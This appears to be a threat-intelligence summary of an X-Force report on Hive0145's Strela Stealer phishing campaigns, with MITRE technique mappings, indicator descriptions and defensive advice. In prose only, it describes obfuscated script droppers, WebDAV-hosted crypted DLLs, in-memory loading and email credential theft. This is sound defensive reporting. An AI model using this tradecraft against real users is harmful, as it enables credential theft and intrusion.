Keypoints
- Hive0145 is a financially motivated initial access broker active since late 2022, focused on harvesting email credentials from Outlook and Thunderbird.
- Campaigns use invoice-themed phishing and, since July 2024, weaponized genuinely stolen emails to send malicious attachments (attachment hijacking).
- Delivery techniques include polyglot files, signed binaries, encrypted ZIPs, obfuscated scripts, and WebDAV-hosted crypted DLLs via a crypter called “Stellar Crypter” and loader “Stellar Loader.”
- Strela Stealer exfiltrates credentials and system/app inventory via POST requests to hardcoded C2 servers and supports language checks to target specific keyboard locales.
- Targeting expanded to include Ukraine in late 2024, with consistent focus on Spanish, German, Italian, Catalan, Basque and Polish victims.
- Operators have adopted automation and higher-volume, weekday-focused campaigns—X‑Force observed weekly campaigns and large-scale activity in late 2024.
- X‑Force recommends caution with ZIP attachments, monitoring rundll32.exe activity, using endpoint security, and educating staff to reduce risk.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Used to deliver invoices and archive attachments that contain obfuscated scripts or executables (‘the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL’).
- [T1566] Phishing – Core initial access vector: invoice-themed emails masquerading as legitimate communications (‘the phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials’).
- [T1105] Ingress Tool Transfer – Malware and crypted DLLs are hosted on WebDAV staging servers and downloaded to victims (‘run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL’).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Obfuscated scripts run PowerShell to fetch and execute payloads from remote servers (‘rely on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL’).
- [T1027] Obfuscated Files or Information – Stellar Loader and other components employ heavy obfuscation and control-flow tricks to hinder analysis (‘Stellar samples are usually highly obfuscated and make use of techniques such as control flow obfuscation’).
- [T1555] Credentials from Password Stores – Strela Stealer extracts stored email credentials from Outlook and Thunderbird registry/keys and uses CryptUnprotectData() to decrypt them (‘Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird’).
- [T1078] Valid Accounts – Stolen, authentic emails and accounts are reused to send follow-on phishing and increase legitimacy (‘began using stolen emails to further spread Strela Stealer’).
- [T1055] Process Injection – Stellar Loader maps and executes PE payloads in memory after decryption using VirtualAlloc and manual PE loading steps (‘Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address’).
- [T1041] Exfiltration Over C2 Channel – Stolen credentials and system/app lists are encrypted and POSTed to hardcoded C2 endpoints (‘Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:’).
- [T1036] Masquerading – Filenames and email content are tailored to mimic legitimate organizations and invoices to evade suspicion (‘filenames to include targeted domain names… often identical to the name of the organization or company’).
Indicators of Compromise
- [File extensions / names] Delivery artifacts and executable naming – uncommon PE extensions .com and .pif used for executables, and attachment names matching organization names (e.g., “Factura” themed filenames).
- [File types] Malicious payload/container examples – encrypted ZIP archives with varying passwords; heavily obfuscated JavaScript files that download crypted DLLs.
- [Certificates] Signed binaries context – valid code signing certificates observed (example: certificate issued to “Tecfinance Informatica E Projetos De Sistemas Ltda”), later revoked.
- [C2 / Responses] Command-and-control indicators – Strela POST responses include strings such as “KH” (2023), “ANTIROK” (2024) and “CHOLLIMA” (Nov. 2024).
- [Hosting] Staging servers context – WebDAV-hosted DLLs used to serve many Stellar Loader/crypted samples (and numerous DLL hashes — and 2 more hashes).
————
Hive0145 has steadily evolved Strela Stealer campaigns from simple invoice lures into sophisticated attachment‑hijacking operations that weaponize legitimately stolen emails. Victims across Spain, Germany, Italy and, more recently, Ukraine receive encrypted ZIPs or obfuscated script attachments that download a crypter/loader chain (Stellar Crypter → Stellar Loader) which decrypts and runs the Strela Stealer payload in memory to harvest Outlook and Thunderbird credentials.
The group uses multiple evasion tactics—polyglot files, valid code signing certificates, uncommon executable extensions (.com/.pif), heavy obfuscation and language checks—to target specific keyboard locales and avoid sandboxing. Stolen email accounts are repurposed to send authentic-looking invoice messages (attachment hijacking), increasing click-through and infection rates. X‑Force observed increased automation and weekday-focused, high-volume campaigns in late 2024 and recommends stricter handling of archive attachments, monitoring rundll32.exe activity, configuring endpoint defenses, and user awareness training.
————
Read more: https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish